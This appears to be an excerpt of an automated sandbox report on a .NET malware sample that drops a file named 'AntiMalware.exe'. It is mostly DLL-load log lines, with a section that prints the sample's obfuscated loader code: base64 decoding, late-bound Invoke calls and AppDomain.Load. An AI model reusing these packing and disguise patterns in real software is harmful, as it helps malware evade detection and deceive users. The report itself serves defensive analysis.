                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                    Source: AntiMalware.lnk.0.drLNK file: ..\..\..\..\..\AntiMalware.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: KJhsNv2RcI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: KJhsNv2RcI.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn._0ZbLIibTghwxIZJjalzEHuH8Ln36oj1ZAcU4rhWEv,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.Okpz2VapysQphQXjNNMEQlQxNAKSEvuyXJi71GOxJ,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.NgnHUBREjKy19w0Vgt2bMnZqmp59keXDBatLE1ofJ,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.QMhPdh9bhkQi8RtiyYmAMOX4NCf0JhReIBRhIPcrs,_3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.qDszvQryBCDTPzMOdKbA8UpNPpveK46OheLVUvGtrulTDlzSXIt2KWvnUb2iyiidc766O7iBy()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{IBeY9xPD0Cn7bbxGDHfyq5kilyFM2TSPWYhjhfVxjtBCR5ble7RYccWp2DvWuXDkj2FYZe5UM[2],_3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M._4WrOspNWcxFR3MqBd9EAsdDoL0qMZ1ZXk0Uc7z300hlE1PHcAGSoAXgPZlJm1kSxeIfdYeW9k(Convert.FromBase64String(IBeY9xPD0Cn7bbxGDHfyq5kilyFM2TSPWYhjhfVxjtBCR5ble7RYccWp2DvWuXDkj2FYZe5UM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn._0ZbLIibTghwxIZJjalzEHuH8Ln36oj1ZAcU4rhWEv,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.Okpz2VapysQphQXjNNMEQlQxNAKSEvuyXJi71GOxJ,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.NgnHUBREjKy19w0Vgt2bMnZqmp59keXDBatLE1ofJ,_2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.QMhPdh9bhkQi8RtiyYmAMOX4NCf0JhReIBRhIPcrs,_3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M.qDszvQryBCDTPzMOdKbA8UpNPpveK46OheLVUvGtrulTDlzSXIt2KWvnUb2iyiidc766O7iBy()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{IBeY9xPD0Cn7bbxGDHfyq5kilyFM2TSPWYhjhfVxjtBCR5ble7RYccWp2DvWuXDkj2FYZe5UM[2],_3asxm3zE8WKKq2mCowDWRa7Zqz1J1LgSLQIXjaZNMoAoiqanhL6gYsxdxef7cVWjbb5h6vA1M._4WrOspNWcxFR3MqBd9EAsdDoL0qMZ1ZXk0Uc7z300hlE1PHcAGSoAXgPZlJm1kSxeIfdYeW9k(Convert.FromBase64String(IBeY9xPD0Cn7bbxGDHfyq5kilyFM2TSPWYhjhfVxjtBCR5ble7RYccWp2DvWuXDkj2FYZe5UM[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: fBBeRTVmZdkXaZ3DZtnjowZJQc8BJUCWNpjM4jrGB System.AppDomain.Load(byte[])
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: ZsVnB4c8nX46Dt8OHVi8LO6k4dfdekqZMfHRaDOA2bBtxuoLlykC0fbT0aLKLVAIsXXh5nzRU System.AppDomain.Load(byte[])
                    Source: KJhsNv2RcI.exe, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: ZsVnB4c8nX46Dt8OHVi8LO6k4dfdekqZMfHRaDOA2bBtxuoLlykC0fbT0aLKLVAIsXXh5nzRU
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: fBBeRTVmZdkXaZ3DZtnjowZJQc8BJUCWNpjM4jrGB System.AppDomain.Load(byte[])
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: ZsVnB4c8nX46Dt8OHVi8LO6k4dfdekqZMfHRaDOA2bBtxuoLlykC0fbT0aLKLVAIsXXh5nzRU System.AppDomain.Load(byte[])
                    Source: AntiMalware.exe.0.dr, bc5d5KxBYG8BSnDb99wxd6G2hCSIQCyI5Pzhb6cYv.cs.Net Code: ZsVnB4c8nX46Dt8OHVi8LO6k4dfdekqZMfHRaDOA2bBtxuoLlykC0fbT0aLKLVAIsXXh5nzRU
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F00AD pushad ; iretd 0_2_00007FFD9B7F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B6DD2A5 pushad ; iretd 1_2_00007FFD9B6DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8C2316 push 8B485F92h; iretd 1_2_00007FFD9B8C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B6CD2A5 pushad ; iretd 4_2_00007FFD9B6CD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B2316 push 8B485F93h; iretd 4_2_00007FFD9B8B231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8B5112 pushad ; iretd 4_2_00007FFD9B8B5131
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B6DD2A5 pushad ; iretd 9_2_00007FFD9B6DD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8C2316 push 8B485F92h; iretd 9_2_00007FFD9B8C231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8C1AC8 push es; retf 9_2_00007FFD9B8C1AC9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6BD2A5 pushad ; iretd 11_2_00007FFD9B6BD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7D19D2 pushad ; ret 11_2_00007FFD9B7D19E1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B7D00AD pushad ; iretd 11_2_00007FFD9B7D00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A2316 push 8B485F94h; iretd 11_2_00007FFD9B8A231B
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 15_2_00007FFD9B7D00AD pushad ; iretd 15_2_00007FFD9B7D00C1
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 17_2_00007FFD9B7E00AD pushad ; iretd 17_2_00007FFD9B7E00C1
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FFD9B7F00AD pushad ; iretd 18_2_00007FFD9B7F00C1
                    Source: KJhsNv2RcI.exe, 2BC6Xw66CdnFwScFoVzJShUMBfhP1HR28CAnuVnGn.csHigh entropy of concatenated method names: 'e3OgAFGQz6Vmh2IHd8IjYfJA8fM8Pe2rH49f5Oq2gQhubly3QaZcKgujadTXC8I3u6hO4GWK3Bwb2oWT1NQXtSpSvIm', 'piA5RRwB8UUUsqDGoFFSSbsQcze4Ews8fxAL7zFjxOJqSLz44Ny8sTthzOlNC7ApppXl2w3vgv01ZbUHAIq9Sl2FcUy', 'rKJKN0I39uqEZJkTms6Ra3yUDR3KEGQciRg4eVSy9LKBh5YwyBA236cK9ra2HDpgL4NG8G8FKD37n0t4j966QJ75ouM', 'fxwKJFZB4wkaIZ2oDfkojqwMp71WxO3Bky0zwBcwPJ3I24KjGleFrp6k2sqDBmqduI5KpLSLCLu5OSJ2JZDrTdf4Nar'
                    Source: KJhsNv2RcI.exe, RCxBoCbPSSvzWYE9.csHigh entropy of concatenated method names: 'TQo4fYtsohOoQC3w', 'hOjjqRC7CF2a1ps1', 'HH6vf3IviJ2J2WMr', '_86yCrhuIzBcVOQ4zd2Wt2piGnlpFvvw3HqW805VIKm0uWtuGW3u9rRznzkvDXd8iUF', 'vv6P2iPZPpXCrISBjFZOgI6c9PtYaxoe1mIetXhBpR1S7l5MNnMtyvIuA1oIBytefw', '_41Ps0Ao2dkOGdjnsUmjRlZOjJoCX0iGIqluQLKn9WO7BzWZPEI2Z8TKS5mjsJuwiqD', 'A59uWJhU3BAFC7ai5AU9JECv4rGNO4pFNIUMysefERanGjn5fhPl4nmIHj7bfI8Kyh', 'g3xbKhCIsQXNMLJEw4Jnnq5t9Q9oMPKgAlGV0HrbP3yVlKPssvXjtV6Qac42Pb7mUQ', 'LVC85HLl0hYhPFBDqkrxDvaA3cHIC7aiBv0LXOVNfNvnP8VvlFgTHD1iZgAfVGrmj1', 'uivYvaDVjD5FdkNWIXUpHEuttARJOxyJahKbJwlkiVu9zRrU3BHt5wi3WcJ8uISfWE'
